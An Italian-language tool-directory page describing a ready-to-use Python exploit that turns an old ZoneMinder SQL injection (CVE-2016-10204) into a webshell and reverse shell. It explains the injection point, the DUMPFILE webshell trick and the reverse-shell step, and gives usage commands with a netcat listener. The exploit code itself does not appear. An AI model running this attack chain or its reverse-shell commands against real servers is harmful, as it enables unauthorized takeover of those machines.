Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
zoneminder-1.29-1.30-rce-exploit — SQL injection non autenticata per exploit RCE per ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC in Python con singolo comando da SQLi a webshell a reverse shell. | Kitploit
Strumenti/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingCommand and ControlSviluppo Payload
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

SQL injection non autenticata per exploit RCE per ZoneMinder 1.29/1.30 (CVE-2016-10204, EDB-41239). PoC in Python con singolo comando da SQLi a webshell a reverse shell.

Vedi Repository
17h 33m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

ZoneMinder 1.29/1.30 SQLi to RCE Exploit

Un exploit Python pronto all'uso per ZoneMinder 1.29/1.30 che concatena la SQL injection non autenticata (CVE-2016-10204, EDB-41239) fino ad arrivare a una reverse shell interattiva.

Questo è un PoC weaponized/automatizzato per una CVE nota e già corretta, non un nuovo exploit.

Il PoC EDB per questo bug si ferma al payload SQLi o al "punta sqlmap contro di esso". Questo exploit impacchetta l'intera catena SQLi to webshell to shell in un unico script leggibile.

Cosa fa

  1. Conferma l'injection con una sonda time-based (SLEEP) sul parametro POST limit di index.php?view=request&request=log&task=query.
  2. Scrive una piccola webshell PHP nella web root tramite SELECT ... INTO DUMPFILE, provando diversi percorsi comuni di ZoneMinder/Apache.
  3. Sonda la webshell attiva, poi lancia una reverse shell bash verso il tuo listener netcat.

Le due insidie che gestisce

  • DUMPFILE, non OUTFILE. OUTFILE esegue l'escape dei newline e rovina il PHP multi-riga; DUMPFILE scrive byte grezzi, quindi la webshell rimane valida.
  • Nome file casuale nuovo a ogni esecuzione. MySQL rifiuta di sovrascrivere un file esistente, quindi un nome fisso va in collisione con un drop obsoleto di un'esecuzione precedente.

Utilizzo

root@kitploit:~
# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# start your listener when prompted, in another terminal
sudo nc -lvnp 443

# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

Crediti

  • FOXMOLE (base dell'advisory per CVE-2016-10204).
  • PoC originale: Exploit-DB 41239.

Licenza

MIT, vedi LICENSE.

Scarica lo strumento